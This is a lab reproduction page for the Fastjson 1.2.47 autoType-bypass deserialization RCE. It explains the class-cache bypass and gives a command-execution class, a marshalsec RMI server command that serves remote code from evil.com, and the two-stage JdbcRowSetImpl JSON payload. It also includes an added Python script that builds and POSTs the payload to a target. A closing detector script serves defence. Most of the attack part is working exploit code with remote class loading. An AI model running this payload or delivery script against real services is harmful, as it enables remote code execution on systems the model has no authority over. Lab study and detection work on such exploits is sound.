### Vulnerability Key Information

#### Vulnerability Description

- **Vulnerability Type**: Fastjson 1.2.47 deserialization remote code execution (RCE).
- **Affected Versions**: Fastjson versions before 1.2.48 (1.2.47 and earlier).
- **Root Cause**: Fastjson added a deserialization whitelist (the autoType check with its deny list) in 1.2.24, but in versions before 1.2.48 it can be bypassed. Deserializing a `java.lang.Class` object loads the class named in its `val` field and caches it in Fastjson's internal class mapping; a later `@type` naming the same class is then served from that cache without being checked against the deny list. A blocked gadget class such as `com.sun.rowset.JdbcRowSetImpl` can therefore be instantiated, and its JNDI lookup lets an attacker execute arbitrary commands.

#### Environment Setup

- Use Docker Compose to start a Spring project that uses Fastjson 1.2.45:

```bash
docker compose up -d
```

- Once the environment is up, access `http://your-ip:8090` to see the returned JSON object.

#### Vulnerability Reproduction

- **Target Environment**: openjdk:8u102. This JDK predates the `com.sun.jndi.rmi.object.trustURLCodebase` restriction (the property defaults to `false` from 8u121 onwards), so an RMI `Reference` may still load a factory class from a remote codebase and command execution is possible.
- **Steps**:
  1. Compile the command-execution class (`TouchFile.java` below) and host the resulting `TouchFile.class` on an HTTP server the target can reach (`http://evil.com/` in this example).
  2. Start an RMI server with the Marshalsec project. `RMIRefServer` answers any lookup name with a reference to the class named after `#` in the codebase URL.
  3. Send the malicious payload to the target server.

```java
// TouchFile.java
// The static initializer runs as soon as the target JVM loads the class
// from the remote codebase, so no method needs to be called explicitly.
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = { "touch", "/tmp/success" };
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}
```

```bash
# Start the RMI server on port 9999; it points lookups at http://evil.com/TouchFile.class
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://evil.com/#TouchFile" 9999
```

Payload to send as the JSON request body (the lookup name `Exploit` is arbitrary, since `RMIRefServer` ignores it; object `a` must precede object `b` so the class is cached before `b` is parsed):

```json
{
    "a": {
        "@type": "java.lang.Class",
        "val": "com.sun.rowset.JdbcRowSetImpl"
    },
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "rmi://evil.com:9999/Exploit",
        "autoCommit": true
    }
}
```

#### Impact and Practical Verification

- The `touch /tmp/success` command runs inside the target container (`/tmp/success` appears), which verifies the RCE.
- Additional exploitation techniques can be found in JNDI injection related resources.
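The three reproduction steps above, expressed as one script (an added example for this page, not vulhub's or Fastjson's own code): it builds the two-stage payload for a given RMI host, port and lookup name, serialises it with the key order Fastjson's cache bypass depends on, and POSTs it to the target. `evil.com`, `your-ip`, port 9999 and the lookup name `Exploit` are the placeholders from the page; the target path `/` is an assumption. The RMI server and the hosted `TouchFile.class` still have to be set up as described above.

```python
"""Build and deliver the Fastjson 1.2.47 autoType-bypass payload.

Added example for this page, not vulhub's own code.  Host names, the
target path and the lookup name are placeholders taken from the page.
"""
import json
import urllib.request

# Constructed defaults mirroring the page; replace with your own hosts.
RMI_HOST = "evil.com"
RMI_PORT = 9999
TARGET_URL = "http://your-ip:8090/"   # assumed path: the app's JSON endpoint

GADGET = "com.sun.rowset.JdbcRowSetImpl"


def build_payload(rmi_host: str = RMI_HOST, rmi_port: int = RMI_PORT,
                  lookup_name: str = "Exploit") -> dict:
    """Return the two-stage JSON object used by the 1.2.47 bypass.

    Stage "a" deserialises a java.lang.Class whose `val` names the gadget;
    Fastjson loads that class and caches it in its class mapping.  Stage "b"
    then names the same class as @type: the autoType check finds it in the
    cache and returns it without consulting the deny list, so JdbcRowSetImpl
    is instantiated and setAutoCommit(true) triggers the JNDI lookup of
    dataSourceName (the attacker's RMI server).  The lookup name after the
    port is arbitrary for marshalsec's RMIRefServer.
    """
    return {
        "a": {"@type": "java.lang.Class", "val": GADGET},
        "b": {
            "@type": GADGET,
            "dataSourceName": f"rmi://{rmi_host}:{rmi_port}/{lookup_name}",
            "autoCommit": True,
        },
    }


def encode_payload(payload: dict) -> bytes:
    """Serialise without reordering keys: "a" must be parsed before "b"."""
    return json.dumps(payload, separators=(",", ":")).encode()


def send_payload(payload: dict, target_url: str = TARGET_URL,
                 timeout: float = 10.0) -> int:
    """POST the JSON body to the target and return the HTTP status code.

    This is the only function that touches the network; the vulnerable
    endpoint parses the body with Fastjson and the JNDI lookup fires
    during parsing, so the response itself carries no sign of success.
    Check the target for /tmp/success instead.
    """
    req = urllib.request.Request(
        target_url,
        data=encode_payload(payload),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status


if __name__ == "__main__":
    print(send_payload(build_payload()))
```

Verify success with `docker compose exec <service> ls -l /tmp/success` rather than from the HTTP response, because the command runs during deserialization and the application usually returns an ordinary error or JSON body either way.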
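The flip side of the reproduction, for anyone who has to spot this payload in traffic or logs: a detector for the bypass shape described above (an added example, not part of the original page). It parses a request body as JSON, walks every object in document order, and reports a `@type` that was first loaded through a `java.lang.Class` stage, as well as a `JdbcRowSetImpl` whose `dataSourceName` points at an RMI or LDAP server. The sample bodies are constructed here; the page's payload is the positive case.

```python
"""Flag JSON request bodies carrying the Fastjson 1.2.47 autoType bypass.

Added example for this page, not vulhub's or Fastjson's own code.
Sample bodies below are constructed for the demonstration.
"""
import json
from typing import Iterator, List, Tuple

# Schemes a JdbcRowSetImpl.dataSourceName can use to reach an attacker server.
JNDI_SCHEMES = ("rmi://", "ldap://", "ldaps://")


def _walk(node, path: str = "$") -> Iterator[Tuple[str, dict]]:
    """Yield (json_path, object) for every JSON object, depth first, in document order."""
    if isinstance(node, dict):
        yield path, node
        for key, value in node.items():
            yield from _walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for idx, value in enumerate(node):
            yield from _walk(value, f"{path}[{idx}]")


def find_bypass(body: str) -> List[str]:
    """Return human-readable findings for one request body (empty list = clean).

    Caveats: Python's json keeps the last of duplicate keys while Fastjson
    parses them in order, and Fastjson also accepts @type names wrapped
    as "L<name>;" or prefixed with "[" in some versions; both are outside
    what this simple walker models.
    """
    findings: List[str] = []
    try:
        doc = json.loads(body)
    except ValueError:
        return findings          # not JSON, nothing for Fastjson to deserialise

    primed = {}                  # class name -> path of the java.lang.Class stage
    for path, obj in _walk(doc):
        type_name = obj.get("@type")
        # Stage 1 of the bypass: java.lang.Class with a class name in "val".
        if type_name == "java.lang.Class" and isinstance(obj.get("val"), str):
            primed.setdefault(obj["val"], path)
            continue
        if not isinstance(type_name, str):
            continue
        # Stage 2: the primed class reappears as @type later in the document.
        if type_name in primed:
            findings.append(
                f"{path}: @type {type_name} primed via java.lang.Class at {primed[type_name]}"
            )
        # JNDI sink regardless of how the class got past autoType.
        data_source = obj.get("dataSourceName")
        if (type_name.endswith("JdbcRowSetImpl")
                and isinstance(data_source, str)
                and data_source.lower().startswith(JNDI_SCHEMES)):
            findings.append(f"{path}: JNDI lookup of {data_source} via {type_name}")
    return findings


# Constructed sample bodies: the page's payload and a benign request.
PAGE_PAYLOAD = (
    '{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
    '"b":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
    '"dataSourceName":"rmi://evil.com:9999/Exploit","autoCommit":true}}'
)
BENIGN = '{"name":"alice","tags":["a","b"],"profile":{"age":30}}'

if __name__ == "__main__":
    for label, body in (("page payload", PAGE_PAYLOAD), ("benign", BENIGN)):
        print(label, "->", find_bypass(body) or "clean")
```

Run over WAF or application-access logs, the first finding is the one worth alerting on: a `java.lang.Class` stage followed by the same class as `@type` has no legitimate use in request bodies, whereas `dataSourceName` alone may appear in configuration-style JSON.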